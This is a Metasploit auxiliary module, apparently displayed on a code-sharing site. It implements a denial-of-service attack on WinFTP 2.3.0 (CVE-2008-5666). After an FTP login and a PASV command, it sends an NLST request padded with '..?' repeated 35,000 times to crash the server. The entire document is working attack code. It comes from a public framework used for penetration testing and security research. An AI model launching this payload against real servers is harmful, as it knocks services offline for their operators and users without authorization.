Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Ftp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'WinFTP 2.3.0 NLST Denial of Service',
13
      'Description'    => %q{
14
        This module is a very rough port of Julien Bedard's
15
        PoC.  You need a valid login, but even anonymous can
16
        do it if it has permission to call NLST.
17
      },
18
      'Author'         => 'kris katterjohn',
19
      'License'        => MSF_LICENSE,
20
      'References'     =>
21
        [
22
          [ 'CVE', '2008-5666' ],
23
          [ 'OSVDB', '49043' ],
24
          [ 'EDB', '6581' ]
25
        ],
26
      'DisclosureDate' => '2008-09-26'))
27
  end
28

29
  def run
30
    return unless connect_login
31

32
    # NLST has to follow a PORT or PASV
33
    resp = send_cmd(['PASV'])
34

35
    raw_send("NLST #{'..?' * 35000}\r\n")
36

37
    disconnect
38
  end
39
end
40

41